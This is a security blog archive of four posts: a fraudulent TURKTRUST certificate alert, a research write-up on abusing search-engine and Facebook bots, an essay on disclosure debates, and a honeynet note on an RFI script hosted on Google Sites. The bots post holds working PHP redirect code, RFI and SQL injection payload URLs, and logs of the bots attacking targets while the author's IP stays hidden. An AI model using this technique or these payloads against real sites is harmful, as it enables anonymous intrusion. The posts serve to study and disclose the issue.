Tag Archives: Google

Fraudulent TURKTRUST Digital Certificate Used In Active Attacks

Google, Microsoft and Mozilla have released alerts regarding active attacks using fraudulent digital certificates issued by TURKTRUST, a Turkish certificate authority and a subsidiary of the Turkish Armed Forces ELELE Foundation Company.

Google's alert states that on 24 December they detected and blocked an unauthorized digital certificate for the “*.google.com” domain. This certificate was issued by an intermediate certificate authority (CA) linked to TURKTRUST. After an investigation conducted in collaboration with TURKTRUST, it appears that an additional intermediate certificate authority was also compromised. The Google Chrome certificate revocation list was updated on 26 December to block these fraudulent intermediate CAs.

Microsoft has released Security Advisory MSA-2798897, which affects all supported releases of Microsoft Windows. Microsoft is updating the Certificate Trust List and providing an update for all supported releases of Microsoft Windows that removes these fraudulent certificates. Systems running Windows 8, Windows RT, Windows Server 2012, and devices running Windows Phone 8 are automatically updated and protected.

The following certificates will be added to the Untrusted Certificates folder:

  • Certificate “*.google.com” issued by “*.EGO.GOV.TR” with thumbprint “4d 85 47 b7 f8 64 13 2a 7f 62 d9 b7 5b 06 85 21 f1 0b 68 e3“.
  • Certificate “e-islem.kktcmerkezbankasi.org” issued by “TURKTRUST Elektronik Sunucu Sertifikasi Hizmetleri” with thumbprint “f9 2b e5 26 6c c0 5d b2 dc 0d c3 f2 dc 74 e0 2d ef d9 49 cb“.
  • Certificate “*.EGO.GOV.TR” issued by “TURKTRUST Elektronik Sunucu Sertifikasi Hizmetleri” with thumbprint “c6 9f 28 c8 25 13 9e 65 a6 46 c4 34 ac a5 a1 d2 00 29 5d b1“.

Mozilla has released a security blog post and takes a different position than Google or Microsoft. The foundation will actively revoke trust in the two fraudulent certificates, but will also suspend inclusion of the “TÜRKTRUST Bilgi İletişim ve Bilişim Güvenliği Hizmetleri A.Ş. (c) Aralık 2007” root certificate, pending further review. A new release of Firefox will be published on Tuesday 8 January.

These fraudulent certificates could be used to spoof content, perform phishing attacks, or perform man-in-the-middle attacks, so we advise you to update as soon as possible.
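As a quick way to check whether a server presents one of the certificates listed above, here is a minimal PHP sketch (not an official tool; it assumes a PHP build with the OpenSSL extension, and the checked host is only an example). The thumbprint of a certificate is simply the SHA-1 hash of its DER encoding.

```php
<?php
// Sketch: fetch a host's TLS certificate and compare its SHA-1
// thumbprint against the revoked TURKTRUST thumbprints listed above.

$revoked = array(
    '4d8547b7f864132a7f62d9b75b068521f10b68e3', // *.google.com
    'f92be5266cc05db2dc0dc3f2dc74e02defd949cb', // e-islem.kktcmerkezbankasi.org
    'c69f28c825139e65a646c434aca5a1d200295db1', // *.EGO.GOV.TR
);

function sha1_thumbprint($x509)
{
    // The thumbprint is the SHA-1 hash of the DER-encoded certificate:
    // export to PEM, strip the armor, base64-decode, then hash.
    openssl_x509_export($x509, $pem);
    $der = base64_decode(preg_replace('/-----[^-]+-----|\s/', '', $pem));
    return sha1($der);
}

function host_cert_revoked($host, array $revoked)
{
    // Open a TLS connection and capture the peer certificate.
    $ctx = stream_context_create(array('ssl' => array('capture_peer_cert' => true)));
    $fp  = @stream_socket_client("ssl://$host:443", $errno, $errstr, 10,
                                 STREAM_CLIENT_CONNECT, $ctx);
    if ($fp === false) {
        return null; // connection failed, status unknown
    }
    $opts  = stream_context_get_params($fp);
    $thumb = sha1_thumbprint($opts['options']['ssl']['peer_certificate']);
    fclose($fp);
    return in_array($thumb, $revoked, true);
}
```

A `true` return from `host_cert_revoked('www.example.com', $revoked)` would mean the host presented one of the blacklisted certificates.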

Bots Command & Conquer

Some months ago, I became interested in suspicious alerts generated on our Honey Net that are related to the dedicated Google AdSense “Mediapartners-Google*” bot.
The Mediapartners bot, as I understand it, works with the Google cache: when a new or existing web page using the AdSense JavaScript code is called by a visitor and is not contained in the Google cache, the Mediapartners bot will fetch the page.

If the web page first invoked by the visitor contains SQL injection, RFI, LFI or XSS URL parameters, the Mediapartners bot will replay the attack. So if you are vulnerable to these web attacks, you will get owned first by the visitor who invoked the vulnerable URL, then by the Mediapartners bot, which copycats the visitor's action. I tested with SQL injection and RFI vulnerabilities: my lab was owned every time, a second time, by the Mediapartners bot.

This bot behavior is interesting, because you may need a web attack that requires two sequences: the first sequence is made by the visitor's call, the second action by the bot. For example, on an RFI vulnerability (http://www.example.com/test.php?id=http://www.proxy.com/id.txt), the visitor's first call will execute the “id.txt” code, and directly after the code execution the original id.txt code could be automatically replaced by different code, which will then be called by the Mediapartners copycat bot.

The Mediapartners bot is not a “classical” search engine bot. A “classical” search engine bot will visit your website depending on its popularity, and surely other criteria, so you have no control over when it will come to visit you. In 2001, lcamtuf (aka Michal Zalewski) published a Phrack article, “Rise of the Robots”, which demonstrated that classical search engines, with their natural “link following” behavior, could also participate in hacking vulnerable websites: just create a web page with thousands of SQL injection or RFI web links, and the search engine bots will follow the links and execute the web attacks. This technique is known as “link spam“. But, as described by lcamtuf, you have no control over the bots' visit timeline.

With the Mediapartners bot, we control the timing, because we know the triggers that call the bot. You need a valid AdSense account, the AdSense JavaScript in your web page, and the web page must not already be in the Google cache. It is quite easy to invoke the bot on demand: create random web pages meeting all the prerequisites, and the job will be done. Bot invocation on demand.
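The “random web pages” step described above could be sketched like this (a hypothetical helper, not the tooling I actually used; the publisher id and ad slot are placeholders you would replace with your own AdSense values):

```php
<?php
// Sketch: generate a freshly named page embedding the AdSense snippet,
// so it cannot already be in the Google cache. A single visit to the
// generated URL should then trigger a Mediapartners-Google fetch.
// Publisher id and slot below are placeholders.

$name = 'page-' . md5(uniqid('', true)) . '.html';

$adsense = '<script type="text/javascript"><!--
google_ad_client = "pub-xxxxxxxxxxxxxxxxx";
google_ad_slot = "0000000000";
google_ad_width = 300;
google_ad_height = 250;
//--></script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>';

file_put_contents($name,
    "<html><body>Some random text\n$adsense\n</body></html>");

echo "created $name\n";
```

A C&C back-end would only have to run this on demand and then request the resulting URL once.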

But there is still one problem: you have to reveal your source IP through the first web page invocation, so the attack is not transparent.

“Classical” search engine bots have interesting features; for example, they react to 301 or 302 HTTP redirections. So you can redirect certain bots wherever you want. Just take a look at the following code, and replace “Bots” with a bot fingerprint:

&lt;?php
// Fingerprint the visitor via browscap (get_browser() requires a
// configured browscap.ini) and 302-redirect matching bots to $URL.
$br = get_browser($_SERVER['HTTP_USER_AGENT'], true);
$a  = $br['browser'];

#$URL = "http://www.xxxxx.com/index.php?option=http://www.yyyy.com/id.txt??";
#$URL = "http://www.xxxxx.com/inject-me.php?id='%20OR%20'a'='a";
$URL = "http://www.xxxxxx.com/";

if (preg_match('/Bots/i', $a)) {
    header("Location: $URL");
    exit;
}

I tested the 302 redirection with the most common search engine bots, and saw that most of them are “vulnerable”.

  • msnbot-media

C&C server – – [14/Jan/2011:21:56:38 +0100] “GET /random_url.php HTTP/1.1” 302 236957 “-” “msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)”

Target server – – [14/Jan/2011:21:56:40 +0100] “GET /robots.txt HTTP/1.1” 200 74 “-” “msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)”
– – [14/Jan/2011:21:56:41 +0100] “GET / HTTP/1.1” 200 15146 “-” “msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)”

  • bingbot

C&C server – – [14/Jan/2011:22:34:49 +0100] “GET /random_url.php HTTP/1.1” 302 19847 “-” “Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)”

Target server – – [14/Jan/2011:22:34:50 +0100] “GET /robots.txt HTTP/1.1” 200 74 “-” “Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)”
– – [14/Jan/2011:22:34:51 +0100] “GET / HTTP/1.1” 200 15146 “-” “Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)”

  • Yahoo! Slurp

C&C server – – [16/Jan/2011:09:08:55 +0100] “GET /random_url.php HTTP/1.0” 302 – “-” “Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)”

  • Googlebot-Image

C&C server – – [14/Jan/2011:22:09:02 +0100] “GET /random_url.php HTTP/1.1” 302 71861 “-” “Googlebot-Image/1.0”

Every time, the bots executed the web attacks, and they were the only source IP of the attack: there is no need to reveal yourself for web hacking, the search engine bots will do the job for you. But, as I explained, you have no control over the bot invocation.

After some research I discovered that the Mediapartners bot is also vulnerable to the 302 redirection. So you know how to call the bot, and you can control it by redirecting it wherever you want.

The page below combines the AdSense snippet (so the Mediapartners bot gets invoked) with the User-Agent check. Note that the PHP redirect has to run before any HTML output, otherwise the Location header cannot be sent.

&lt;?php
$br = get_browser($_SERVER['HTTP_USER_AGENT'], true);
$a  = $br['browser'];

#$URL = "http://www.xxxxx.com/index.php?option=http://www.yyyy.com/id.txt??";
#$URL = "http://www.xxxxx.com/inject-me.php?id='%20OR%20'a'='a";
$URL = "http://www.yyyy.com";

if (preg_match('/Mediapartners/i', $a)) {
    header("Location: $URL");
    exit;
}
?>
Some random text
<script type="text/javascript"><!--
google_ad_client = "pub-xxxxxxxxxxxxxxxxx";
google_ad_slot = "1169124694";
google_ad_width = 300;
google_ad_height = 250;
//--></script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>

Below is the result. I still have to invoke the bot first, but then the bot is redirected to the target URL, hiding my source IP.

C&C server – – [13/Jan/2011:00:27:40 +0100] “GET /random_URL.php HTTP/1.1” 200 1290 “-” “Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.231 Safari/534.10”
– – [13/Jan/2011:00:27:42 +0100] “GET /random_URL.php HTTP/1.1” 302 1288 “-” “Mediapartners-Google”

Target server – – [13/Jan/2011:00:27:42 +0100] “GET / HTTP/1.1” 200 15146 “-” “Mediapartners-Google”

What is interesting to see is that the Mediapartners bot source IP on the C&C server is not the same as the source IP on the target server: the Mediapartners bots are sharing orders between different source servers.

I now have a fully controllable bot; time and target are customizable. It is quite simple to create a C&C back-end that generates random on-demand web pages and invokes the bot. After more tests, the Mediapartners bot supports not only the HTTP and HTTPS protocols, but also FTP.

– – [15/Jan/2011:00:19:26 +0100] “GET /random_URL.php HTTP/1.1” 302 91754 “-” “Mediapartners-Google”

[root@xxxxx ~]# tcpdump -n port 21
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes

00:19:27.956865 IP > xxx.xxx.xxx.xxx.ftp: S 1218834134:1218834134(0) win 5840
00:19:27.956983 IP xxx.xxx.xxx.xxx.ftp > S 2218131910:2218131910(0) ack 1218834135 win 5792
00:19:27.972538 IP > xxx.xxx.xxx.xxx.ftp: . ack 1 win 92
00:19:27.973972 IP xxx.xxx.xxx.xxx.ftp > P 1:266(265) ack 1 win 91
00:19:27.989653 IP > xxx.xxx.xxx.xxx.ftp: . ack 266 win 108
00:19:27.989864 IP > xxx.xxx.xxx.xxx.ftp: P 1:17(16) ack 266 win 108
00:19:27.989894 IP xxx.xxx.xxx.xxx.ftp > . ack 17 win 91
00:19:27.990238 IP xxx.xxx.xxx.xxx.ftp > F 266:266(0) ack 17 win 91
00:19:28.005937 IP > xxx.xxx.xxx.xxx.ftp: F 17:17(0) ack 267 win 108
00:19:28.005975 IP xxx.xxx.xxx.xxx.ftp > . ack 18 win 91
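The FTP follow-up seen in the capture above needs nothing more than an ftp:// target in the Location header. A minimal sketch (the target address is a placeholder):

```php
<?php
// Sketch: redirect the Mediapartners bot to an FTP URL instead of HTTP;
// the bot then opens an FTP connection to the target, as in the tcpdump
// capture above. The target address is a placeholder.
$ua = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '';
if (preg_match('/Mediapartners/i', $ua)) {
    header('Location: ftp://xxx.xxx.xxx.xxx/');
    exit;
}
```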

Is the Mediapartners bot the only fully controllable bot? No 🙂 Another example is the Facebook “facebookexternalhit” bot. Below is Facebook's description of the bot:

“Facebook allows its users to send links to interesting web content to other Facebook users. Part of how this works on the Facebook system involves the temporary display of certain images or details related to the web content, such as the title of the webpage or the embed tag of a video. Our system retrieves this information only after a user provides us with a link.”

When you publish a URL in your Facebook wall status, the “facebookexternalhit” bot will fetch the URL and cache the content for later delivery. So you control the bot invocation. Facebook has some security mechanisms that don't permit you to publish a link on your wall containing SQL injection, RFI, LFI or XSS in its parameters.

But the “facebookexternalhit” bot is also vulnerable to the 302 redirection, allowing you to bypass these security mechanisms.

C&C server – – [14/Jan/2011:22:40:57 +0100] “GET /random_URL.php HTTP/1.1” 302 65629 “-” “facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)”

Target server – – [14/Jan/2011:22:40:58 +0100] “GET / HTTP/1.1” 200 9545 “-” “facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)”

Just publish a “normal” link in your Facebook status: the bot will fetch the page and be directly redirected, for example, to a SQL injection URL. What is funny is that the result of the web attack will be displayed on your wall 🙂

Result of a 302 SQL injection in the title HTML tag
Result of a LFI web attack on a targeted server after 302 redirection

A lot of bots are vulnerable to different attacks; you never see them, but take care of them. I would like to thank jduck from the Metasploit Team for providing me with some useful information.

Responsible Disclosure vs Coordinated Vulnerability Disclosure, the never-ending debate

On 10 June, Tavis Ormandy, a researcher on Google's security team, published a vulnerability in the “Microsoft Windows Help Centre” that made a lot of noise on the Internet and within the IT security community. The debate over “responsible disclosure” of vulnerabilities versus “full disclosure” resurfaced.

It has to be said that Taviso had reported the vulnerability to Microsoft only 4 days before publishing it on the Internet, leaving Microsoft very little time to react and provide end users with a way to protect themselves against it. In his advisory, Taviso stated that the research on this vulnerability had been done on his personal time and that Google could in no way be associated with the disclosure. One could nevertheless find, at the end of the advisory, acknowledgements addressed to other members of the Google security team.

In the same advisory, Taviso encouraged Internet users to contact Microsoft and push for shorter reaction times to advisories submitted by security researchers. Taviso's position is clear: software vendors such as Microsoft must not delay, once notified of a vulnerability, in making security updates available. If a security researcher was able to find this vulnerability, a malicious actor could have discovered it too. The security of companies and Internet users is at stake.

As for Microsoft, its position was just as clear: who better than the vendor to find the root cause of the vulnerability and thus provide the best fix for it? According to Microsoft, Taviso had provided an incomplete analysis of the vulnerability, as well as a mitigation that was too easily bypassed. Microsoft does not dispute that security researchers are indispensable, but advocates, just like Google, responsible disclosure of vulnerabilities. Disclosing a vulnerability without an available patch can put the security of companies and Internet users at risk.

The dilemma is there: security through obscurity, as well as security through disclosure, whether responsible or not, can both endanger the security of companies and Internet users.

There is nevertheless one fact not to forget: a few months earlier, Google had been the target of a targeted and persistent attack (Operation Aurora). That attack exploited a 0day in Internet Explorer 6 and allowed malicious actors to steal sensitive Google data. Also keep in mind that Google and Microsoft are competitors in many sectors: web browsers, operating systems, SaaS, etc.

On Tuesday 20 July, the controversy over vulnerability disclosure reached a new stage. A post jointly signed by Tavis Ormandy and other members of the Google security team proposes reducing the deadline to 60 days between the moment the vendor is notified of a critical vulnerability and the moment that same critical vulnerability is made public. Google invites other security researchers to follow the same disclosure policy in order to put “pressure” on vendors of vulnerable software.

As a counter-attack, on Thursday 22 July, Microsoft announced a change in its approach to vulnerability disclosure. Until now, Microsoft had also been a follower of the “Responsible Disclosure” method, but since this announcement the new method it will apply is named “Coordinated Vulnerability Disclosure”. Merely a question of semantics?

In order to “put an end” to the never-ending debate (which Microsoft fuels with this announcement), Microsoft insists that coordination and collaboration are required to resolve these issues and reduce the risks for Internet users. Microsoft stresses that disclosing a vulnerability is a responsibility that must be shared between the various actors involved in its discovery (the researcher), its coordination (CERTs, Secunia), and its handling and resolution (the vendor). This shared responsibility relies on stronger collaboration between vendor and researcher.

In any case, the communication war and the vulnerability disclosure debate are not about to stop. The commercial war between Google and Microsoft is only beginning.

Remote File Inclusion in Google Cloud – nurhayati satu

Everyone knows the Cloud security problematic and the associated issues, which are more and more visible. In July 2008, Outblaze and Spamhaus blocked Amazon EC2 public IP ranges due to distribution of spam and malware. In April 2009, Arbor Networks reported that a malicious Google AppEngine application was used as a botnet C&C. In April 2010, VoIP Tech Chat reported Amazon EC2 SIP brute-force attacks; despite an abuse report to Amazon EC2, the attacks still continued into May, etc.

In March 2009, our Honey Net reported malicious Remote File Inclusion code hosted on Google Sites, which was invoked in a few events. The Google Sites was called “nurhayati satu“, an Indonesian first name and surname. The invoked malicious script was “http://sites.google.com/site/nurhayatisatu/1.txt???“.
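RFI attempts of this kind are easy to spot in web server logs: a URL parameter whose value is itself a remote URL is a strong signal. A minimal sketch (the log line below is a made-up example in Apache combined format, not a real Honey Net event):

```php
<?php
// Sketch: grep access-log lines for RFI-style parameters pointing at a
// remote script, such as the "nurhayatisatu/1.txt???" payload. The sample
// line is fabricated for illustration.
$lines = array(
    '1.2.3.4 - - [01/Mar/2009:12:00:00 +0100] "GET /index.php?option=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 200 512 "-" "libwww-perl/5.805"',
);

// A parameter value that is itself an http/https/ftp URL to a .txt file.
$rfi = '/[?&][a-z0-9_]+=(https?|ftp):\/\/[^ "]+\.txt/i';

foreach ($lines as $line) {
    if (preg_match($rfi, $line)) {
        echo "possible RFI attempt: $line\n";
    }
}
```

In practice you would feed real access-log lines into `$lines` (or stream the file) instead of the hard-coded sample.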


Between March 2009 and May 2010 there was no further sign of life from this Google Sites. But since May the number of events has increased, and we could observe the apparition of the “Cloud” phenomenon: the “nurhayati satu” Google Sites now has around 16 IP addresses associated as hosting servers, and all of these IP addresses are owned by Google Inc.

It is interesting to visualize the interactions of the attackers' source IPs (in blue) with the Google Sites Cloud destination IPs (in green).

Google Sites Cloud RFI

You can see that the attackers' source IPs are not tied to a single hosting server IP, but invoke the “Cloud” IPs as well.

Through the search engine of the “nurhayati satu” Google Sites you can find other hosted classical scripts: scanners, tcl bots, etc.

Everyone knows the Google results labelled ‘This site may harm your computer‘.

It would be funny if Google Sites itself were labelled this way. More seriously, should we report Google Sites to DShield, Abuse.ch or Emerging Threats? Should we block Google, since Google is delivering malware through its Cloud infrastructure, and no one cares 🙂